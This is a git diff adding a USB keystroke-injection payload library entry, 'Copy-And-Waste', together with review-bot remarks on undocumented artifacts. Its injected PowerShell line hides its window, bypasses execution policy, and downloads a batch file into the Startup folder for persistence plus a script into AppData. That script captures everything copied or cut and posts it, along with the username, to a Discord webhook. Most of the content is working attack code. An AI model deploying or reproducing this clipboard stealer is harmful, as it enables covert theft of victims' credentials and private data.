diff --git a/payloads/library/exfiltration/Copy-And-Waste/I.bat b/payloads/library/exfiltration/Copy-And-Waste/I.bat
new file mode 100644
index 00000000..665c9be9
--- /dev/null
+++ b/payloads/library/exfiltration/Copy-And-Waste/I.bat
@@ -0,0 +1,3 @@
+@echo off
+powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}"
+pause
diff --git a/payloads/library/exfiltration/Copy-And-Waste/README.md b/payloads/library/exfiltration/Copy-And-Waste/README.md
new file mode 100644
index 00000000..93c4db2b
--- /dev/null
+++ b/payloads/library/exfiltration/Copy-And-Waste/README.md
@@ -0,0 +1,119 @@
+ + +
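Review bot: The file is committed as `I.bat` (capital i), but the README command and payload.txt both save it as `l.bat` (lowercase L) in the Startup folder, so the name in the repository does not match the artifact left on disk. The README Description should name the on-disk file, for example `**l.bat** (I.bat in this repository) is written to the Startup folder`, so that anyone locating or removing it searches for the right name. I.bat itself carries no comment; a line such as `REM Launches %USERPROFILE%\AppData\Roaming\c.ps1 with a hidden window and -Ep Bypass at logon` after `@echo off` would state what it starts.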

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# Copy-And-Waste + +A payload to exfiltrate clipboard contents + +## Description + +This payload uses iwr to download 2 files +* I.bat +* c.ps1 + +**I.bat** is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup + +**c.ps1** will sit in AppData\Roaming folder, waiting for a Ctrl + C or Ctrl + X click + +Then the contents will then be sent to the discord webhook for viewing pleasure + +For killing the script press both Ctrl buttons at the same time [It will resume at reboot] + + +## Getting Started + +### Dependencies + +* Pastebin or other file sharing service, Discord webhook or other webhook service +* Windows 10,11 +* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks + +

(back to top)

+ +### Executing program + +* Plug in your device +* Device will download both files and place them in proper directories to then run the script +``` +powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1"" +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here: + +[atomiczsec](https://github.com/atomiczsec) & +[I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

📱 My Socials 📱

+
+ + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Jsonnet + +
I-Am-Jakoby's Discord +
+
+ +

(back to top)

+ + + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

diff --git a/payloads/library/exfiltration/Copy-And-Waste/c.ps1 b/payloads/library/exfiltration/Copy-And-Waste/c.ps1
new file mode 100644
index 00000000..0215ae3b
--- /dev/null
+++ b/payloads/library/exfiltration/Copy-And-Waste/c.ps1
@@ -0,0 +1,36 @@
+Add-Type -AssemblyName WindowsBase
+Add-Type -AssemblyName PresentationCore
+
+function dischat {
+
+ [CmdletBinding()]
+ param (
+ [Parameter (Position=0,Mandatory = $True)]
+ [string]$con
+ )
+
+ $hookUrl = 'YOUR DISCORD WEBHOOK'
+
+$Body = @{
+ 'username' = $env:username
+ 'content' = $con
+}
+
+
+Invoke-RestMethod -Uri $hookUrl -Method 'post' -Body $Body
+
+}
+
+
+dischat (get-clipboard)
+
+while (1){
+ $Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl')
+ $Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::RightCtrl)
+ $cKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::c)
+ $xKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::x)
+
+ if (($Lctrl -or $Rctrl) -and ($xKey -or $cKey)) {dischat (Get-Clipboard)}
+ elseif ($Rctrl -and $Lctrl) {dischat "---------connection lost----------";exit}
+ else {continue}
+}
\ No newline at end of file
diff --git a/payloads/library/exfiltration/Copy-And-Waste/payload.txt b/payloads/library/exfiltration/Copy-And-Waste/payload.txt
new file mode 100644
index 00000000..a44aae6f
--- /dev/null
+++ b/payloads/library/exfiltration/Copy-And-Waste/payload.txt
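Review bot: c.ps1 has no header comment saying what leaves the machine: `dischat` posts the clipboard text together with `$env:username` to the URL in `$hookUrl`, once at start and again whenever the loop sees Ctrl held with C or X. Whatever the user copies, credentials included, is therefore stored by a third-party webhook provider, and the webhook URL sits in plaintext in the file left under AppData\Roaming. I would add a comment above `function dischat` such as `# Sends clipboard text and $env:username to $hookUrl; captured data may include credentials and is retained by the webhook provider`. The `while (1)` loop has no wait between polls, so the process presumably shows sustained CPU use while it runs, which is worth stating in the README next to the file names.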
@@ -0,0 +1,17 @@
+REM Title: Copy-And-Waste
+
+REM Author: atomiczsec & I am Jakoby
+
+REM Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook
+
+REM Target: Windows 10, 11
+
+DELAY 2000
+GUI
+DELAY
+STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
+ENTER
+
+REM Remember to replace the link with your pastebin shared link for the intended files to download
+REM Also remember to put in your discord webhook in c.ps1
+REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH
\ No newline at end of file
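Review bot: The `STRING` line writes whatever the two paste URLs return into the Startup folder and `%APPDATA%` and then runs it, with nothing tying that content to the `I.bat` and `c.ps1` in this commit. A paste can be edited after it is shared, so the code that runs on the target is whatever the paste holds at that moment. The trailing `REM` lines cover only the links and the webhook and do not list what is left behind. I would add `REM Artifacts left on target: %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\l.bat and %APPDATA%\c.ps1 - delete both to remove persistence` so the files can be found and removed after a test.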